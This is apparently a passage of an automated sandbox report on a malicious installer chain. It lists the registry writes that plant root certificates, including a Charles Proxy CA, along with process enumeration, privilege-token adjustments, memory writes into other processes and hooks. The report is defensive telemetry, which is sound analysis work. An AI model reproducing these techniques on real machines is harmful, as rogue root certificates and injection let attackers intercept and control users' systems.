ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD	Oy3L2GjKns.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	19EE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	SHyqaefepynae.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	SHyqaefepynae.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	19EE.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	19EE.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	Oy3L2GjKns.exe

Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXE

pid process

6284 PING.EXE
5508 PING.EXE
5092 PING.EXE
5784 PING.EXE

pid	process
6284	PING.EXE
5508	PING.EXE
5092	PING.EXE
5784	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

ultramediaburner.tmpSHyqaefepynae.exe

pid	process
1580	ultramediaburner.tmp
1580	ultramediaburner.tmp
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe
1656	SHyqaefepynae.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

2988

pid	process
2988

Suspicious behavior: MapViewOfSection 42 IoCs

Processes:

MicrosoftEdgeCP.exetoolspab1.exeFessura.exe.comMutato.exe.comjwtwjbtexplorer.exeexplorer.exeexplorer.exeMicrosoftEdgeCP.exejwtwjbtjwtwjbt

pid	process
4196	MicrosoftEdgeCP.exe
4196	MicrosoftEdgeCP.exe
5072	toolspab1.exe
2988
2988
2988
2988
2988
2988
2988
2988
2988
2988
2988
2988
2988
2988
2988
2988
2988
2988
5300	Fessura.exe.com
5772	Mutato.exe.com
5772	Mutato.exe.com
5772	Mutato.exe.com
6524	jwtwjbt
6084	explorer.exe
6084	explorer.exe
6084	explorer.exe
6084	explorer.exe
2776	explorer.exe
2776	explorer.exe
2776	explorer.exe
2776	explorer.exe
2432	explorer.exe
2432	explorer.exe
2432	explorer.exe
2432	explorer.exe
4496	MicrosoftEdgeCP.exe
4496	MicrosoftEdgeCP.exe
1576	jwtwjbt
3800	jwtwjbt

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Ultra.exeSHyqaefepynae.exeLulevugodu.exeConhost.exeMicrosoftEdge.exemsiexec.exeinstaller.exe

description	pid	process
Token: SeDebugPrivilege	2432	Ultra.exe
Token: SeDebugPrivilege	1656	SHyqaefepynae.exe
Token: SeDebugPrivilege	4052	Lulevugodu.exe
Token: SeDebugPrivilege	4256	Conhost.exe
Token: SeDebugPrivilege	4136	MicrosoftEdge.exe
Token: SeDebugPrivilege	4136	MicrosoftEdge.exe
Token: SeDebugPrivilege	4136	MicrosoftEdge.exe
Token: SeDebugPrivilege	4136	MicrosoftEdge.exe
Token: SeSecurityPrivilege	4188	msiexec.exe
Token: SeCreateTokenPrivilege	4644	installer.exe
Token: SeAssignPrimaryTokenPrivilege	4644	installer.exe
Token: SeLockMemoryPrivilege	4644	installer.exe
Token: SeIncreaseQuotaPrivilege	4644	installer.exe
Token: SeMachineAccountPrivilege	4644	installer.exe
Token: SeTcbPrivilege	4644	installer.exe
Token: SeSecurityPrivilege	4644	installer.exe
Token: SeTakeOwnershipPrivilege	4644	installer.exe
Token: SeLoadDriverPrivilege	4644	installer.exe
Token: SeSystemProfilePrivilege	4644	installer.exe
Token: SeSystemtimePrivilege	4644	installer.exe
Token: SeProfSingleProcessPrivilege	4644	installer.exe
Token: SeIncBasePriorityPrivilege	4644	installer.exe
Token: SeCreatePagefilePrivilege	4644	installer.exe
Token: SeCreatePermanentPrivilege	4644	installer.exe
Token: SeBackupPrivilege	4644	installer.exe
Token: SeRestorePrivilege	4644	installer.exe
Token: SeShutdownPrivilege	4644	installer.exe
Token: SeDebugPrivilege	4644	installer.exe
Token: SeAuditPrivilege	4644	installer.exe
Token: SeSystemEnvironmentPrivilege	4644	installer.exe
Token: SeChangeNotifyPrivilege	4644	installer.exe
Token: SeRemoteShutdownPrivilege	4644	installer.exe
Token: SeUndockPrivilege	4644	installer.exe
Token: SeSyncAgentPrivilege	4644	installer.exe
Token: SeEnableDelegationPrivilege	4644	installer.exe
Token: SeManageVolumePrivilege	4644	installer.exe
Token: SeImpersonatePrivilege	4644	installer.exe
Token: SeCreateGlobalPrivilege	4644	installer.exe
Token: SeCreateTokenPrivilege	4644	installer.exe
Token: SeAssignPrimaryTokenPrivilege	4644	installer.exe
Token: SeLockMemoryPrivilege	4644	installer.exe
Token: SeIncreaseQuotaPrivilege	4644	installer.exe
Token: SeMachineAccountPrivilege	4644	installer.exe
Token: SeTcbPrivilege	4644	installer.exe
Token: SeSecurityPrivilege	4644	installer.exe
Token: SeTakeOwnershipPrivilege	4644	installer.exe
Token: SeLoadDriverPrivilege	4644	installer.exe
Token: SeSystemProfilePrivilege	4644	installer.exe
Token: SeSystemtimePrivilege	4644	installer.exe
Token: SeProfSingleProcessPrivilege	4644	installer.exe
Token: SeIncBasePriorityPrivilege	4644	installer.exe
Token: SeCreatePagefilePrivilege	4644	installer.exe
Token: SeCreatePermanentPrivilege	4644	installer.exe
Token: SeBackupPrivilege	4644	installer.exe
Token: SeRestorePrivilege	4644	installer.exe
Token: SeShutdownPrivilege	4644	installer.exe
Token: SeDebugPrivilege	4644	installer.exe
Token: SeAuditPrivilege	4644	installer.exe
Token: SeSystemEnvironmentPrivilege	4644	installer.exe
Token: SeChangeNotifyPrivilege	4644	installer.exe
Token: SeRemoteShutdownPrivilege	4644	installer.exe
Token: SeUndockPrivilege	4644	installer.exe
Token: SeSyncAgentPrivilege	4644	installer.exe
Token: SeEnableDelegationPrivilege	4644	installer.exe

Suspicious use of FindShellTrayWindow 12 IoCs

Processes:

ultramediaburner.tmpinstaller.exe

pid process

1580 ultramediaburner.tmp
4644 installer.exe
2988
2988
2988
2988
2988
2988
2988
2988
2988
2988

Suspicious use of SetWindowsHookEx 9 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exegoogle-game.exeC41.exeMicrosoftEdge.exeMicrosoftEdgeCP.exe

pid	process
4136	MicrosoftEdge.exe
4196	MicrosoftEdgeCP.exe
2196	google-game.exe
2196	google-game.exe
4196	MicrosoftEdgeCP.exe
4220	C41.exe
4040	MicrosoftEdge.exe
4496	MicrosoftEdgeCP.exe
4496	MicrosoftEdgeCP.exe

Suspicious use of UnmapMainImage 1 IoCs

Processes:

pid process

2988

pid	process
2988

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Install.exeInstall.tmpUltra.exeultramediaburner.exeultramediaburner.tmpSHyqaefepynae.execmd.execmd.execmd.execmd.exeConhost.execmd.exegpooe.exemsiexec.execmd.exegoogle-game.exe

description	pid	process	target process
PID 568 wrote to memory of 2800	568	Install.exe	Install.tmp
PID 568 wrote to memory of 2800	568	Install.exe	Install.tmp
PID 568 wrote to memory of 2800	568	Install.exe	Install.tmp
PID 2800 wrote to memory of 2432	2800	Install.tmp	Ultra.exe
PID 2800 wrote to memory of 2432	2800	Install.tmp	Ultra.exe
PID 2432 wrote to memory of 2100	2432	Ultra.exe	ultramediaburner.exe
PID 2432 wrote to memory of 2100	2432	Ultra.exe	ultramediaburner.exe
PID 2432 wrote to memory of 2100	2432	Ultra.exe	ultramediaburner.exe
PID 2100 wrote to memory of 1580	2100	ultramediaburner.exe	ultramediaburner.tmp
PID 2100 wrote to memory of 1580	2100	ultramediaburner.exe	ultramediaburner.tmp
